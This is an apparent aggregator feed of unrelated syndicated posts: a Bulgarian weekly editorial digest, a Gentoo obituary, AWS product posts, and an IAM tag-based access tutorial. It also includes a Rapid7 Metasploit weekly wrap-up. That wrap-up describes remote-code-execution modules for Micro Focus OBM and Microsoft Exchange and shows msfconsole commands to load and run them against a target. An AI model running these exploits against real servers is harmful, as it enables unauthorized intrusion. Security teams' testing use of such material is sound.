The Week in „Тоест“ (8–12 February)

Post Syndicated from Тоест original https://toest.bg/editorial-8-12-february-2021/

This government was an insult to our national dignity, and we must find a way to atone for our guilt for having elected it and put up with it for so long!

Светла Енчева

The quote is from the journalist Стойко Тонев, better known by his pen name Тони Филипов, д-р, who passed away on 31 January this year. During the week, his colleagues at reduta.bg announced their decision to bring their joint undertaking to a close. „Редута“ will be missed by many. In a farewell piece, Светла Енчева recalls why the site was a redoubt of sorts against mediocrity and silence. We at „Тоест“ chose the opening quote as a reminder that voters' guilt is accumulated, or redeemed, at elections. And elections are approaching.


Емилия Милчева

And while we are on the subject of elections, Емилия Милчева looks at the phenomenon of the "civic quota" – that is, the names that parties slip in among their own yes-men in an effort to add "colour and aroma" to the bland menu before serving it to their voters. A special selection of formally non-partisan figures who, however, "are also willing to wiggle their ears for the audience's amusement and to share the food on their plate with whomever the parties tell them to".


Венелина Попова

Венелина Попова's weekly domestic-politics commentary is also devoted to the elections, specifically the new pre-election coalitions already taking shape. Few of them appear to be built on principles or a shared ideology. Most are opportunistic and, for now at least, promise more intrigue than solutions to the major problems facing Bulgaria.


Марин Бодаков

Марин Бодаков is not satisfied with the obvious explanations of the situation we live in, offered by the usual suspects – political scientists, sociologists, economists, columnists and others. So he sought out the psychoanalyst Светлозар Василев for a conversation. Whether accepting failure is one possible way to de-escalate narcissism and hatred – read the interview, titled „Не сме центърът на вселената“ ("We Are Not the Centre of the Universe").


It is time for the column „По буквите“ and Марин's new recommendations for books worth your attention. This time they are „Мъжът с червеното палто“ (The Man in the Red Coat) by Julian Barnes, „Флъш“ (Flush) by Virginia Woolf, and „Трилогия. Бдение. Бленуванията на Улав. Отмала“ (Trilogy: Wakefulness, Olav's Dreams, Weariness) by Jon Fosse.


Нева Мичева

Let us close the issue with a conversation about how we recognise true friendship – in the form, of course, of a reply to a reader's letter in the column „Говори с Нева“. "Friendship is one of the fundamental human talents and one of our key chances of survival," Нева Мичева concludes, but before that she invites us to read her friends' definitions of friendship. And to look at the plaques on a few New York park benches.

Stay healthy, and see you next Saturday!

„Тоест“ relies solely on the financial support of its readers.

Gentoo mourns the loss of Kent Fredric

Post Syndicated from original https://lwn.net/Articles/846054/rss

A brief post on the Gentoo site is in memory of Kent “kent\n” Fredric.
Kent was an active member of the Gentoo community for many years. He tirelessly managed Gentoo’s Perl support, and was active in the Rust project as well as in many other corners. We all remember him as an enthusiastic, bright person, with lots of eye for detail and constant willingness to help out and improve things. On behalf of the world-wide Gentoo community, our heartfelt condolences go out to his family and friends.

Medieval Security Techniques

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/02/medieval-security-techniques.html

Sonja Drummer describes (with photographs) two medieval security techniques. The first is for authentication: a document has been cut in half with an irregular pattern, so that the two halves can be brought together to prove authenticity. The second is for integrity: hashed lines written above and below a block of text ensure that no one can add additional text at a later date.

Architecture Monthly Magazine: Manufacturing

Post Syndicated from Jane Scolieri original https://aws.amazon.com/blogs/architecture/architecture-monthly-magazine-manufacturing/


How is operational data being used to transform manufacturing? Steve Blackwell, AWS Worldwide Tech Leader for manufacturing, speaks about considerations for architecting for manufacturing, considerations for Industry 4.0 applications and data, and AWS for Industrial.

We hope you’ll find this edition of Architecture Monthly useful. My team would like your feedback, so please give us a rating and include your comments on the Amazon Kindle page. You can view past issues and reach out to [email protected] anytime with your questions and comments.

In this month’s Manufacturing issue:

  • Ask an Expert: Steve Blackwell, Tech Leader, Manufacturing, AWS
  • Case Study: Amazon Prime Air’s Drone Takes Flight with AWS and Siemens
  • Reference Architecture: PTC Windchill Product Lifecycle Management on AWS
  • Blog: How Genie® (a Terex® brand) improved paint quality using AWS IoT SiteWise
  • Solution: Amazon Virtual Andon
  • Whitepaper: Achieve Production Optimization with AWS Machine Learning
  • Reference Architecture: OSIsoft PI System Enterprise Data Infrastructure on AWS
  • Blog: AWS for Industrial – Making it easy for customers to scale their industrial
    workloads on AWS
  • Case Study: Arneg Predicts Customer Maintenance Needs Worldwide Using Amazon
    Forecast and Amazon SageMaker
  • Related Videos: Driving Predictive Quality with Machine Connectivity, AWS Knows
    Industrial Operations

Download the Magazine

How to access the magazine

View and download past issues as PDFs on the AWS Architecture Monthly webpage.
Readers in the US, UK, Germany, and France can subscribe to the Kindle version of the magazine at Kindle Newsstand.
Visit Flipboard, a personalized mobile magazine app that you can also read on your computer.
We hope you’re enjoying Architecture Monthly, and we’d like to hear from you—leave us a star rating and comment on the Amazon Kindle Newsstand page or contact us anytime at [email protected].

Metasploit Wrap-Up

Post Syndicated from Adam Galway original https://blog.rapid7.com/2021/02/12/metasploit-wrap-up-98/

MicroFocus? More like MacroVuln


Micro Focus’s Operations Bridge Manager (OBM) is a security information and event management (SIEM) tool designed to collect and parse security logs from multiple disparate sources. OBM has a large attack surface—something Pedro Ribeiro was able to take advantage of with his new RCE module. This module leverages a Java deserialization bug to allow payload execution as either root or SYSTEM, depending on the victim OS.

We’ve one other OBM module currently in the process of being landed, but for anyone who needs their fix of MicroFocus hacks right away, we’d recommend pedrib’s super detailed writeup of his findings.
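If you want to try the new module, a quick way to locate it in msfconsole without memorizing its full path is the search command. A minimal sketch (the search terms and result index are illustrative; substitute the index of the OBM exploit from your own search output):

msf6 > search Operations Bridge Manager type:exploit
msf6 > use 0

Here, use 0 loads the first module returned by the preceding search.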

Patches? We don’t need no stinkin’ patches!

While PR #14607 doesn’t add a totally new exploit for Microsoft Exchange Server, that’s only because zeroSteiner was able to update an earlier module to support a bypass for the patch that was supposed to fix the vuln it exploited.

CVE-2020-16875 originally allowed remote attackers to execute arbitrary code on affected installations of Microsoft Exchange Server, so long as they were authenticated as a user who had an active mailbox and was assigned the Data Loss Prevention role. This was believed to have been patched in Exchange Server 2016 Cumulative Update 18 (September 15, 2020) and Exchange Server 2019 Cumulative Update 7 (September 15, 2020). However, that patch was later bypassed, and the bypass was assigned CVE-2020-17132. Microsoft’s second patch was also later bypassed—a tough break for organizations’ patch cycles. Both the original vulnerability and the patch bypass were discovered by Steven Seeley, and the Metasploit code is based on his work.

zeroSteiner’s changes allow the exchange_ecp_dlp_policy module to exploit both patched versions of Exchange Server as well as unpatched servers.
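A hedged sketch of driving the updated module from msfconsole follows; the full module path and the target hostname are assumptions, and you should check show options for the authoritative option list (including the credential options for the required mailbox user):

msf6 > use exploit/windows/http/exchange_ecp_dlp_policy
msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set RHOSTS exchange.example.local
msf6 exploit(windows/http/exchange_ecp_dlp_policy) > show options
msf6 exploit(windows/http/exchange_ecp_dlp_policy) > exploit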

External modules, internal quality

Last but not least, cgranleese-r7 has spearheaded our efforts to improve the usability of Metasploit’s external modules by providing more informative error messages when users lack the required language runtimes in their environment (#14480). This should help users avoid missing out on useful modules simply because they didn’t know that languages other than Ruby can be needed for the full Metasploit experience.

msf6 > use auxiliary/scanner/msmail/host_id
[-] Failed to load module: LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
msf6 >

New modules (1)

  • Micro Focus Operations Bridge Manager Authenticated Remote Code Execution by Pedro Ribeiro, which exploits ZDI-20-1327 / CVE-2020-11853. This adds an exploit module that leverages an insecure Java deserialization vulnerability in multiple Micro Focus products. It allows remote code execution as the root user on Linux or the SYSTEM user on Windows. Initial authentication is required, but any low-privileged user can be used to successfully run this exploit.

Enhancements and features

  • #14154 from cgranleese-r7 This ensures that all modules that previously used manual AutoCheck behavior now leverage the AutoCheck mixin instead.
  • #14480 from cgranleese-r7 Improves the handling of external modules when they’re missing runtime dependencies and gives the user a more useful error. It will now return which runtime language the user is missing on their environment (this has been implemented for both Python and Go).
  • #14607 from zeroSteiner This updates the Exchange ECP DLP Policy module exploit to leverage a new technique that bypasses the original patch. This new technique also works on unpatched versions.
  • #14669 from jmartin-r7 Improves error message feedback when using the auxiliary/analyze/crack_* modules. Examples include notifying the user that the database needs to be active and that the John the Ripper Jumbo patch needs to be installed.
  • #14685 from geyslan Reduces the size of the linux/x64/shell_bind_tcp_random_port payload while maintaining its functionality.
  • #14708 from timwr Adds offsets to the exploit/osx/browser/safari_proxy_object_type_confusion exploit module for macOS 10.13.1 and 10.13.2.
  • #14721 from bcoles This adds a target for Debian 10 to the sudo exploit CVE-2021-3156.
  • #14728 from FireFart Updates have been made to lib/msf/core/module/reference.rb as well as associated tools and documentation to update old WPVDB links with the new WPVDB domain and to also ensure that the new URL format is properly checked in the respective tools.
  • #14725 from h00die This moves credentials to a default-cred "userpass" list instead of splitting known credential pairs across files.

Bugs fixed

  • #14714 from adfoster-r7 Updates the sqlite3 gem in preparation for Ruby 3.0 support and fixes a SQLite3 deprecation warning.
  • #14720 from dwelch-r7 Fixed an issue in the lib/msf/core/exploit/remote/http_client.rb and lib/msf/core/opt_http_rhost_url.rb libraries where the VHOST datastore variable would be set incorrectly if a user used an /etc/hosts entry for resolving a hostname to an IP address.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub.

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
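For example, a minimal sketch of pulling the latest framework source from the public GitHub repository (this assumes Ruby and Bundler are already installed on your system):

git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
bundle install      # install the Ruby gem dependencies
./msfconsole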

Opt-in to the new Amazon SES console experience

Post Syndicated from Simon Poile original https://aws.amazon.com/blogs/messaging-and-targeting/amazon-ses-console-opt-in/

Amazon Web Services (AWS) is pleased to announce the launch of the newly redesigned Amazon Simple Email Service (SES) console. With its streamlined look and feel, the new console makes it even easier for customers to leverage the speed, reliability, and flexibility that Amazon SES has to offer. Customers can access the new console experience via an opt-in link on the classic console.

Amazon SES now offers a new, optimized console to provide customers with a simpler, more intuitive way to create and manage their resources, collect sending activity data, and monitor reputation health. It also has a more robust set of configuration options and new features and functionality not previously available in the classic console.

Here are a few of the improvements customers can find in the new Amazon SES console:

Verified identities

The new console streamlines how customers manage their sender identities in Amazon SES by replacing the classic console’s identity management section with verified identities—a centralized place in which customers can view, create, and configure both domain and email address identities on one page. Other notable improvements include:

  • DKIM-based verification
    DKIM-based domain verification replaces the previous verification method which was based on TXT records. DomainKeys Identified Mail (DKIM) is an email authentication mechanism that receiving mail servers use to validate email. This new verification method offers customers the added benefit of enhancing their deliverability with DKIM-compliant email providers, and helping them achieve compliance with DMARC (Domain-based Message Authentication, Reporting and Conformance).
  • Amazon SES mailbox simulator
    The new mailbox simulator makes it significantly easier for customers to test how their applications handle different email sending scenarios. From a dropdown, customers select which scenario they’d like to simulate. Scenario options include bounces, complaints, and automatic out-of-office responses. The mailbox simulator provides customers with a safe environment in which to test their email sending capabilities.
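For example, a hedged sketch of exercising the same simulator scenarios from the AWS CLI (the sender address is a placeholder and must be a verified identity; bounce@simulator.amazonses.com is one of the documented simulator addresses, and the shorthand CLI options shown may vary by CLI version):

aws ses send-email \
  --from sender@example.com \
  --to bounce@simulator.amazonses.com \
  --subject "Mailbox simulator test" \
  --text "This message should generate a simulated hard bounce."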

Configuration sets

The new console makes it easier for customers to experience the benefits of using configuration sets. Configuration sets enable customers to capture and publish event data for specific segments of their email sending program. They also isolate IP reputation by segment through the assignment of dedicated IP pools. With a wider range of configuration options, such as reputation tracking and custom suppression options, customers get even more out of this powerful feature.

  • Default configuration set
    One important feature to highlight is the introduction of the default configuration set. By assigning a default configuration set to an identity, customers ensure that the assigned configuration set is always applied to messages sent from that identity at the time of sending. This enables customers to associate a dedicated IP pool or set up event publishing for an identity without having to modify their email headers.
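As a hedged sketch, the same assignment can be made with the SESv2 CLI (the identity and configuration set names are placeholders):

aws sesv2 put-email-identity-configuration-set-attributes \
  --email-identity example.com \
  --configuration-set-name my-default-config-set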

Account dashboard

There is also an account dashboard for the new SES console. This feature provides customers with fast access to key information about their account, including sending limits and restrictions, and overall account health. A visual representation of the customer’s daily email usage helps them ensure that they aren’t approaching their sending limits. Additionally, customers who use the Amazon SES SMTP interface to send emails can visit the account dashboard to obtain or update their SMTP credentials.
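Much of the same account-level information is also available programmatically; a brief sketch using the SESv2 and classic SES CLIs:

# Sending limits, sending status, and other account-level details
aws sesv2 get-account

# Recent sending activity (delivery attempts, bounces, complaints, rejects)
aws ses get-send-statistics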

Reputation metrics

The new reputation metrics page provides customers with high-level insight into historic bounce and complaint rates. This is viewed at both the account level and the configuration set level. Bounce and complaint rates are two important metrics that Amazon SES considers when assessing a customer’s sender reputation, as well as the overall health of their account.

The redesigned Amazon SES console, with its easy-to-use workflows, will not only enhance customers’ onboarding experience, it will also improve their ongoing, day-to-day usage. The Amazon SES team remains committed to investing on behalf of our customers and empowering them to be productive anywhere, anytime. We invite you to opt in to the new Amazon SES console experience and let us know what you think.

Use tags to manage and secure access to additional types of IAM resources

Post Syndicated from Michael Switzer original https://aws.amazon.com/blogs/security/use-tags-to-manage-and-secure-access-to-additional-types-of-iam-resources/

AWS Identity and Access Management (IAM) now enables Amazon Web Services (AWS) administrators to use tags to manage and secure access to more types of IAM resources, such as customer managed IAM policies, Security Assertion Markup Language (SAML) providers, and virtual multi-factor authentication (MFA) devices. A tag is an attribute that consists of a key and an optional value that you can attach to an AWS resource. With this launch, administrators can attach tags to additional IAM resources to identify resource owners and grant fine-grained access to these resources at scale using attribute-based access control. For example, a security administrator in an AWS organization can now attach tags to all customer managed policies and then create a single policy for local administrators within the member accounts, which grants them permissions to manage only those customer managed policies that have a matching tag.
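As a hedged illustration of that last scenario (the tag key team and the action list below are assumptions made for this sketch, not taken from the post), a local administrator's policy could scope management of customer managed policies to those carrying a matching tag:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "ManagePoliciesWithMatchingTeamTag",
            "Effect": "Allow",
            "Action": [
                "iam:CreatePolicyVersion",
                "iam:DeletePolicyVersion",
                "iam:SetDefaultPolicyVersion"
            ],
            "Resource": "arn:aws:iam::<AccountNumber>:policy/*",
            "Condition": {
                "StringEquals": {
                    "aws:ResourceTag/team": "${aws:PrincipalTag/team}"
                }
            }
        }
    ]
}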

In this post, I first discuss the additional IAM resources that now support tags. Then I walk you through two use cases that demonstrate how you can use tags to identify an IAM resource owner, and how you can further restrict access to AWS resources based on prefixes and tag values.

Which IAM resources now support tags?

In addition to IAM roles and IAM users, which already support tags, you can now tag more types of IAM resources. The following table shows the other IAM resources that now support tags, and highlights which of them can be tagged in the IAM console and which via the API and CLI.

IAM resource                  | Tagging in IAM console | Tagging via API and CLI
Customer managed IAM policies | Yes                    | Yes
Instance profiles             | No                     | Yes
OpenID Connect providers      | Yes                    | Yes
SAML providers                | Yes                    | Yes
Server certificates           | No                     | Yes
Virtual MFA devices           | No                     | Yes
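For example, a brief sketch of tagging and inspecting one of the newly supported resource types from the CLI (the policy ARN and tag values are placeholders):

# Attach an Owner tag to an existing customer managed policy
$aws iam tag-policy --policy-arn arn:aws:iam::<AccountNumber>:policy/Developer-TestPolicy --tags '[{"Key": "Owner", "Value": "JohnA"}]'

# Confirm the tags on the policy
$aws iam list-policy-tags --policy-arn arn:aws:iam::<AccountNumber>:policy/Developer-TestPolicy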

Fine-grained resource ownership and access using tags

In the next sections, I will walk through two examples of how to use tagging to classify your IAM resources and define least-privileged access for your developers. In the first example, I explain how to use tags to allow your developers to declare ownership of a customer managed policy they create. In the second example, I explain how to use tags to enforce least privilege allowing developers to only pass IAM roles with Amazon Elastic Compute Cloud (Amazon EC2) instance profiles they create.

Example 1: Use tags to identify the owner of a customer managed policy

As an AWS administrator, you can require your developers to always tag the customer managed policies they create. You can then use the tag to identify which of your developers owns the customer managed policies.

For example, as an AWS administrator, you can require the developers in your organization to tag any customer managed policy they create. To achieve this, you can require the policy creator to enter their username as the value for the tag key Owner when they create the resource. By enforcing tagging on customer managed policies, administrators can easily identify the owner of these IAM policy types.

To enforce customer managed policy tagging, you first grant your developer the ability to create IAM customer managed policies, and include a conditional statement within the IAM policy that requires your developer to apply their AWS user name in the tag value field titled Owner when they create the policy.

Step 1: Create an IAM policy and attach it to your developer role

Following is a sample IAM policy (TagCustomerManagedPolicies.json) that you can assign to your developer. You can use this policy to follow along with this example in your own AWS account. For your own policies and commands, replace the instances of <AccountNumber> in this example with your own AWS account ID.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "TagCustomerManagedPolicies",
            "Effect": "Allow",
            "Action": [
                "iam:CreatePolicy",
                "iam:TagPolicy"
            ],
            "Resource": "arn:aws:iam::: <AccountNumber>:policy/Developer-*",
            "Condition": {
                "StringEquals": {
                    "aws:RequestTag/Owner": "${aws:username}"
                }
            }
        }
    ]
} 

This policy requires the developer to enter their AWS user name as the tag value to declare AWS resource ownership during customer managed policy creation. The TagCustomerManagedPolicies.json policy also requires the developer to name any customer managed policy they create with the Developer- prefix.

Create the TagCustomerManagedPolicies.json file, then create a managed policy using the following CLI command:

$aws iam create-policy --policy-name TagCustomerManagedPolicies --policy-document file://TagCustomerManagedPolicies.json

After you create the TagCustomerManagedPolicies policy, attach it to your developer with the following command. This example assumes your developer has an IAM user profile and that their AWS user name is JohnA.

$aws iam attach-user-policy --policy-arn arn:aws:iam::<AccountNumber>:policy/TagCustomerManagedPolicies --user-name JohnA

Step 2: Ensure the developer uses appropriate tags when creating IAM policies

If your developer attempts to create a customer managed policy without applying their AWS user name as the value for the Owner tag, or fails to name the customer managed policy with the required Developer- prefix, this IAM policy will not allow the developer to create the resource. The error received by the developer is shown in the following example.

$ aws iam create-policy --policy-name TestPolicy --policy-document file://Developer-TestPolicy.json 

An error occurred (AccessDenied) when calling the CreatePolicy operation: User: arn:aws:iam::<AccountNumber>:user/JohnA is not authorized to perform: iam:CreatePolicy on resource: policy TestPolicy

However, if your developer applies their AWS user name as the value for the Owner tag and names the policy with the Developer- prefix, the IAM policy will enable your developer to successfully create the customer managed policy, as shown in the following example.

$aws iam create-policy --policy-name Developer-TestPolicy --policy-document file://Developer-TestPolicy.json --tags '{"Key": "Owner", "Value": "JohnA"}'

{
  "Policy": {
    "PolicyName": "Developer-Test_policy",
    "PolicyId": "<PolicyId>",
    "Arn": "arn:aws:iam::<AccountNumber>:policy/Developer-Test_policy",
    "Path": "/",
    "DefaultVersionId": "v1",
    "Tags": [
      {
        "Key": "Owner",
        "Value": "JohnA"
      }
    ],
    "AttachmentCount": 0,
    "PermissionsBoundaryUsageCount": 0,
    "IsAttachable": true,
    "CreateDate": "2020-07-27T21:18:10Z",
    "UpdateDate": "2020-07-27T21:18:10Z"
  }
}

Example 2: Use tags to control which IAM roles your developers attach to an instance profile

Amazon EC2 enables customers to run compute resources in the cloud. AWS developers use IAM instance profiles to associate IAM roles to EC2 instances hosting their applications. This instance profile is used to pass an IAM role to an EC2 instance to grant it privileges to invoke actions on behalf of an application hosted within it.

In this example, I show how you can use tags to control which IAM roles your developers can add to instance profiles. You can use this as a starting point for your own workloads, or follow along with this example as a learning exercise. For your own policies and commands, replace the instances of <AccountNumber> in this example with your own AWS account ID.

Let’s assume your developer is running an application on their EC2 instance that needs read and write permissions to objects within various developer owned Amazon Simple Storage Service (S3) buckets. To allow your application to perform these actions, you need to associate an IAM role with the required S3 permissions to an instance profile of your EC2 instance that is hosting your application.

To achieve this, you will do the following:

  1. Create a permissions boundary policy and require your developer to attach the permissions boundary policy to any IAM role they create. The permissions boundary policy defines the maximum permissions your developer can assign to any IAM role they create. For examples of how to use permissions boundary policies, see Add Tags to Manage Your AWS IAM Users and Roles.
  2. Grant your developer permissions to create and tag IAM roles and instance profiles. Your developer will use the instance profile to pass the IAM role to their EC2 instance hosting their application.
  3. Grant your developer permissions to create and apply IAM permissions to the IAM role they create.
  4. Grant your developer permissions to assign IAM roles to instance profiles of their EC2 instances based on the Owner tag they applied to the IAM role and instance profile they created.

Step 1: Create a permissions boundary policy

First, create the permissions boundary policy (S3ActionBoundary.json) that defines the maximum S3 permissions for the IAM role your developer creates. Following is an example of a permissions boundary policy.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "S3ActionBoundary",
            "Effect": "Allow",
            "Action": [
                "S3:CreateBucket",
                "S3:ListAllMyBuckets",
                "S3:GetBucketLocation",
                "S3:PutObject",
                "S3:PutObjectAcl"
            ],
            "Resource": "arn:aws:s3:::Developer-*",
            "Condition": {
                "StringEquals": {
                    "aws:RequestedRegion": "us-east-1"
                }
            }
        }
    ]
}

When used as a permissions boundary, this policy enables your developers to grant permissions for some S3 actions, as long as two requirements are met. First, the S3 bucket name must begin with the Developer- prefix. Second, the region used to make the request must be US East (N. Virginia).

Similar to the previous example, you can create the S3ActionBoundary.json, then create a managed IAM policy using the following CLI command:

$aws iam create-policy --policy-name S3ActionBoundary --policy-document file://S3ActionBoundary.json

Step 2: Grant your developer permissions to create and tag IAM roles and instance profiles

Next, create the IAM policy (DeveloperCreateActions.json) that allows your developer to create IAM roles and instance profiles. Any roles they create will not be allowed to exceed the permissions of the boundary policy we created in step 1, and any resources they create must be tagged according to the guideline we established earlier. Following is an example DeveloperCreateActions.json policy.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "CreateRole",
            "Effect": "Allow",
            "Action": "iam:CreateRole",
            "Resource": "arn:aws:iam::<AccountNumber>:role/Developer-*",
            "Condition": {
                "StringEquals": {
                    "aws:RequestTag/Owner": "${aws:username}",
                    "iam:PermissionsBoundary": "arn:aws:iam::<AccountNumber>:policy/S3ActionBoundary"
                }
            }
        },
        {
            "Sid": "CreatePolicyandInstanceProfile",
            "Effect": "Allow",
            "Action": [
                "iam:CreateInstanceProfile",
                "iam:CreatePolicy"
            ],
            "Resource": [
                "arn:aws:iam::<AccountNumber>:instance-profile/Developer-*",
                "arn:aws:iam::<AccountNumber>:policy/Developer-*"
            ],
            "Condition": {
                "StringEquals": {
                    "aws:RequestTag/Owner": "${aws:username}"
                }
            }
        },
        {
            "Sid": "TagActionsAndAttachActions",
            "Effect": "Allow",
            "Action": [
                "iam:TagInstanceProfile",
                "iam:TagPolicy",
                "iam:AttachRolePolicy",
                "iam:TagRole"
            ],
            "Resource": [
                "arn:aws:iam::<AccountNumber>:instance-profile/Developer-*",
                "arn:aws:iam::<AccountNumber>:policy/Developer-*",
                "arn:aws:iam::<AccountNumber>:role/Developer-*"
            ],
            "Condition": {
                "StringEquals": {
                    "aws:ResourceTag/Owner": "${aws:username}"
                }
            }
        }
    ]
}

I will walk through each statement in the policy to explain its function.

The first statement, CreateRole, allows creating IAM roles. The Condition element of the policy requires your developer to apply their AWS user name as the Owner tag to any IAM role they create. It also requires your developer to attach the S3ActionBoundary as a permissions boundary policy to any IAM role they create.

The next statement, CreatePolicyandInstanceProfile, allows creating IAM policies and instance profiles. The Resource element requires your developer to name any IAM policy or instance profile they create with the Developer- prefix, and the Condition element requires them to attach the Owner tag to the resources they create.

The last statement TagActionsAndAttachActions allows tagging managed policies, instance profiles and roles with the Owner tag. It also allows attaching role policies, so they can configure the permissions for the roles they create. The Resource and Condition elements of the policy require the developer to use the Developer- prefix and their AWS user name as the Owner tag, respectively.

Once you create the DeveloperCreateActions.json file locally, you can create it as an IAM policy and attach it to your developer using the following CLI commands:

$aws iam create-policy --policy-name DeveloperCreateActions --policy-document file://DeveloperCreateActions.json 

$aws iam attach-user-policy --policy-arn arn:aws:iam::<AccountNumber>:policy/DeveloperCreateActions --user-name JohnA

With the preceding policy, your developer can now create an instance profile, an IAM role, and the permissions they will attach to the IAM role. For example, if your developer creates an instance profile and doesn’t apply their AWS user name as the Owner tag, the IAM policy will prevent the resource creation and return an error, as shown in the following example.

$aws iam create-instance-profile --instance-profile-name Developer-EC2-InstanceProfile

An error occurred (AccessDenied) when calling the CreateInstanceProfile operation: User: arn:aws:iam::<AccountNumber>:user/JohnA is not authorized to perform: iam:CreateInstanceProfile on resource: arn:aws:iam::<AccountNumber>:instance-profile/Developer-EC2-InstanceProfile

When your developer names the instance profile with the prefix Developer- and includes their AWS user name as value for the Owner tag in the create request, the IAM policy allows the create action to occur as shown in the following example.

$aws iam create-instance-profile --instance-profile-name Developer-EC2-InstanceProfile --tags '{"Key": "Owner", "Value": "JohnA"}'

{
    "InstanceProfile": {
        "Path": "/",
        "InstanceProfileName":"Developer-EC2-InstanceProfile",
        "InstanceProfileId":" AIPAR3HKUNWB24NBA3HRC",
        "Arn": "arn:aws:iam::<AccountNumber>:instance-profile/Developer-EC2-InstanceProfile",
        "CreateDate": "2020-07-30T21:24:30Z",
        "Roles": [],
        "Tags": [
            {
                "Key": "Owner",
                "Value": "JohnA"
            }
        ]

    }
}

Let’s assume your developer creates an IAM role called Developer-EC2. The Developer-EC2 role has your developer’s AWS user name (JohnA) as the Owner tag, the S3ActionBoundary policy as its permissions boundary, and the Developer-ApplicationS3Access.json policy as the permissions policy that your developer will pass to their EC2 instance to allow it to call S3 on behalf of their application. This is shown in the following example.

<Details of the role trust policy – RoleTrustPolicy.json>
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Service": "ec2.amazonaws.com"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}
<Details of IAM role permissions – Developer-ApplicationS3Access.json>

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "S3Access",
            "Effect": "Allow",
            "Action": [
                "S3:GetBucketLocation",
                "S3:PutObject",
                "S3:PutObjectAcl"
            ],
            "Resource": "arn:aws:s3:::Developer-*"
        }
    ]
}

<Your developer creates IAM role with a permissions boundary policy and a role trust policy>

$aws iam create-role --role-name Developer-EC2 \
--assume-role-policy-document file://RoleTrustPolicy.json \
--permissions-boundary arn:aws:iam::<AccountNumber>:policy/S3ActionBoundary --tags '{"Key": "Owner", "Value": "JohnA"}'


<Your developer creates IAM policy for the newly created IAM role>
$aws iam create-policy --policy-name Developer-ApplicationS3Access --policy-document file://Developer-ApplicationS3Access.json --tags '{"Key": "Owner", "Value": "JohnA"}'

<Your developer attaches newly created IAM policy to the newly created IAM role >
$aws iam attach-role-policy --policy-arn arn:aws:iam::<AccountNumber>:policy/Developer-ApplicationS3Access --role-name Developer-EC2

Step 3: Grant your developer permissions to create and apply IAM permissions to the IAM role they create

By using the AddRoleAssociateInstanceProfile.json IAM policy provided below, you allow your developers to pass their new IAM role to an instance profile they create. The same naming and tagging requirements apply, because the DeveloperCreateActions.json policy, which you already assigned to your developer in an earlier step, only allows your developer to administer resources that are properly prefixed with Developer- and have their user name assigned to the resource tag. The following example shows details of the AddRoleAssociateInstanceProfile.json policy.

< AddRoleAssociateInstanceProfile.json>
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AddRoleToInstanceProfile",
            "Effect": "Allow",
            "Action": [
                "iam:AddRoleToInstanceProfile",
                "iam:PassRole"
            ],
            "Resource": [
                "arn:aws:iam::<AccountNumber>:instance-profile/Developer-*",
                "arn:aws:iam::<AccountNumber>:role/Developer-*"
            ],
            "Condition": {
                "StringEquals": {
                    "aws:ResourceTag/Owner": "${aws:username}"
                }
            }
        },
        {
            "Sid": "AssociateInstanceProfile",
            "Effect": "Allow",
            "Action": "ec2:AssociateIamInstanceProfile",
            "Resource": "arn:aws:ec2:us-east-1:<AccountNumber>:instance/Developer-*"
        }
    ]
}

Once you create the AddRoleAssociateInstanceProfile.json file locally, you can create it as an IAM policy and attach it to your developer using the following CLI commands:

$aws iam create-policy --policy-name AddRoleAssociateInstanceProfile --policy-document file://AddRoleAssociateInstanceProfile.json

$aws iam attach-user-policy --policy-arn arn:aws:iam::<AccountNumber>:policy/AddRoleAssociateInstanceProfile --user-name Developer

If your developer’s AWS user name is the Owner tag for the Developer-EC2-InstanceProfile instance profile and the Developer-EC2 IAM role, then AWS allows your developer to add the Developer-EC2 role to the Developer-EC2-InstanceProfile instance profile. However, if your developer attempts to add the Developer-EC2 role to an instance profile they don’t own, AWS won’t allow the action, as shown in the following example.

aws iam add-role-to-instance-profile --instance-profile-name EC2-access-Profile --role-name Developer-EC2

An error occurred (AccessDenied) when calling the AddRoleToInstanceProfile operation: User: arn:aws:iam::<AccountNumber>:user/Developer is not authorized to perform: iam:AddRoleToInstanceProfile on resource: instance profile EC2-access-profile

When your developer adds the IAM role to the instance profile they own, the IAM policy allows the action, as shown in the following example.

aws iam add-role-to-instance-profile --instance-profile-name Developer-EC2-InstanceProfile --role-name Developer-EC2

You can verify this by checking which instance profiles contain the Developer-EC2 role, as follows.

$aws iam list-instance-profiles-for-role --role-name Developer-EC2


<Result>
{
    "InstanceProfiles": [
        {
            "InstanceProfileId": "AIDGPMS9RO4H3FEXAMPLE",
            "Roles": [
                {
                    "AssumeRolePolicyDocument": "<URL-encoded-JSON>",
                    "RoleId": "AIDACKCEVSQ6C2EXAMPLE",
                    "CreateDate": "2020-06-07T20: 42: 15Z",
                    "RoleName": "Developer-EC2",
                    "Path": "/",
                    "Arn":"arn:aws:iam::<AccountNumber>:role/Developer-EC2"
                }
            ],
            "CreateDate":"2020-06-07T21:05:24Z",
            "InstanceProfileName":"Developer-EC2-InstanceProfile",
            "Path": "/",
            "Arn":"arn:aws:iam::<AccountNumber>:instance-profile/Developer-EC2-InstanceProfile"
        }
    ]
}

Step 4: Grant your developer permissions to add IAM roles to instance profiles based on the Owner tag

Your developer can then associate the instance profile (Developer-EC2-InstanceProfile) with the EC2 instance running their application, by using the following command.

aws ec2 associate-iam-instance-profile --instance-id i-1234567890EXAMPLE --iam-instance-profile Name="Developer-EC2-InstanceProfile"

{
    "IamInstanceProfileAssociation": {
        "InstanceId": "i-1234567890EXAMPLE",
        "State": "associating",
        "AssociationId": "iip-assoc-0dbd8529a48294120",
        "IamInstanceProfile": {
            "Id": "AIDGPMS9RO4H3FEXAMPLE",
            "Arn": "arn:aws:iam::<AccountNumber>:instance-profile/Developer-EC2-InstanceProfile"
        }
    }
}

Summary

